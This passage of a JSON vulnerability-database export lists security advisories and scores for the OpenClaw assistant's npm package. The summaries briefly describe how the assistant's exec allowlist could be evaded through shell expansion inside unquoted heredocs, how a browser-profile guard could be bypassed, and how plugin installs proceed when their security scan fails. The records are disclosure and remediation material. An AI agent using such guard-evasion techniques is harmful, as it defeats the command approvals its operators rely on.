"VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "GHSA-5r8f-96gm-5j6g" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k5da-7tht-w3bs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89025?format=api", "vulnerability_id": "VCID-k8s8-zjv4-gqdb", "summary": "OpenClaw: Paired-device pairing actions were not limited to the caller device\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nA paired device session with limited pairing scope could enumerate global pairing state and act on pairing requests that belonged to another device within the same gateway scope ceiling.\n\nThis is a same-gateway paired-device authorization bug, not a remote unauthenticated issue. Severity is low.\n\n## Fix\n\nPairing management actions are now limited to the caller device, so non-admin paired-device sessions cannot approve or operate on unrelated pending device requests.\n\nFix commit:\n\n- `5a12f30441d5b0b151f550daa2c5c9e8db61e2e6`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/5a12f30441d5b0b151f550daa2c5c9e8db61e2e6", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/5a12f30441d5b0b151f550daa2c5c9e8db61e2e6" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xrq9-jm7v-g9h7", "reference_id": "", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xrq9-jm7v-g9h7" }, { "reference_url": "https://github.com/advisories/GHSA-xrq9-jm7v-g9h7", "reference_id": "GHSA-xrq9-jm7v-g9h7", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xrq9-jm7v-g9h7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api", "purl": "pkg:npm/openclaw@2026.4.20", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20" } ], "aliases": [ "GHSA-xrq9-jm7v-g9h7" ], "risk_score": 1.4, "exploitability": "0.5", "weighted_severity": "2.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k8s8-zjv4-gqdb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95751?format=api", "vulnerability_id": "VCID-kcy2-a98b-uyg7", "summary": "OpenClaw's exec allowlist analysis rejects shell expansion in unquoted heredocs\n## Summary\nExec allowlist analysis rejects shell expansion in unquoted heredocs\n\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nAn allowlisted command containing an unquoted heredoc could hide shell expansion in the heredoc body. That could make the approved command text look safer than what the shell would evaluate at runtime.\n\n## Fix\nThe exec command analyzer now tracks heredoc bodies, rejects unquoted heredoc expansion tokens and continuation-splice bypasses, and preserves quoted heredocs and literal safe text.\n\n## Fix Commit(s)\n- b2e8b7d4bb2f22eaa16f5c4b07547774e90b65a5\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nThanks @VladimirEliTokarev for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/b2e8b7d4bb2f22eaa16f5c4b07547774e90b65a5", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/b2e8b7d4bb2f22eaa16f5c4b07547774e90b65a5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x3h8-jrgh-p8jx", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x3h8-jrgh-p8jx" }, { "reference_url": "https://github.com/advisories/GHSA-x3h8-jrgh-p8jx", "reference_id": "GHSA-x3h8-jrgh-p8jx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x3h8-jrgh-p8jx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/114466?format=api", "purl": "pkg:npm/openclaw@2026.4.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22" } ], "aliases": [ "GHSA-x3h8-jrgh-p8jx" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kcy2-a98b-uyg7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89149?format=api", "vulnerability_id": "VCID-kzgh-7f6h-kfd1", "summary": "OpenClaw: Security Scan Failure Does Not Block Plugin Installation (Fail-Open)\n## Summary\nSecurity Scan Failure Does Not Block Plugin Installation (Fail-Open)\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: Real in shipped v2026.3.28 plugin install flow, but low severity fits because it still requires an operator to choose installation of an untrusted package and the scan failure was visible rather than silent.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `7a953a52271b9188a5fa830739a4366614ff9916` — 2026-03-30T15:36:08+01:00\n- `44b993613601280d46a5b88190e46669fc13d669` — 2026-03-31T23:16:11+09:00\n- `0d7f1e2c84eca65df7dee890d9c30e2a841c030a` — 2026-03-31T23:27:20+09:00\n- `bf96c67fd1954740aeabfadc7cfe3098bcfc6b68` — 2026-03-31T15:53:29+01:00\n\nOpenClaw thanks @davidluzsilva for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41377", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11725", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11684", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11719", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41377" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/0d7f1e2c84eca65df7dee890d9c30e2a841c030a", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/0d7f1e2c84eca65df7dee890d9c30e2a841c030a" }, { "reference_url": "https://github.com/openclaw/openclaw/44b993613601280d46a5b88190e46669fc13d669", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/44b993613601280d46a5b88190e46669fc13d669" }, { "reference_url": "https://github.com/openclaw/openclaw/bf96c67fd1954740aeabfadc7cfe3098bcfc6b68", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/bf96c67fd1954740aeabfadc7cfe3098bcfc6b68" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/0d7f1e2c84eca65df7dee890d9c30e2a841c030a", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/0d7f1e2c84eca65df7dee890d9c30e2a841c030a" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/44b993613601280d46a5b88190e46669fc13d669", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/44b993613601280d46a5b88190e46669fc13d669" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/7a953a52271b9188a5fa830739a4366614ff9916", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/7a953a52271b9188a5fa830739a4366614ff9916" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/bf96c67fd1954740aeabfadc7cfe3098bcfc6b68", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/bf96c67fd1954740aeabfadc7cfe3098bcfc6b68" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cwq8-6f96-g3q4", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cwq8-6f96-g3q4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41377", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41377" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-fail-open-security-scan-bypass-in-plugin-installation", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-fail-open-security-scan-bypass-in-plugin-installation" }, { "reference_url": "https://github.com/advisories/GHSA-cwq8-6f96-g3q4", "reference_id": "GHSA-cwq8-6f96-g3q4", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cwq8-6f96-g3q4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41377", "GHSA-cwq8-6f96-g3q4" ], "risk_score": 2.3, "exploitability": "0.5", "weighted_severity": "4.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kzgh-7f6h-kfd1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89934?format=api", "vulnerability_id": "VCID-ma62-gtan-97au", "summary": "## Impact\n\nOpenClaw `node.invoke(browser.proxy)` bypasses `browser.request` persistent profile-mutation guard.\n\nnode.invoke(browser.proxy) could mutate persistent browser profiles through a path that bypassed the browser.request guard.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= v2026.04.01`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @nicky-cc of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42431", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11153", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11187", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11193", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42431" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "7.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:12:10Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cmfr-9m2r-xwhq", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "7.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:12:10Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cmfr-9m2r-xwhq" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42431", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": 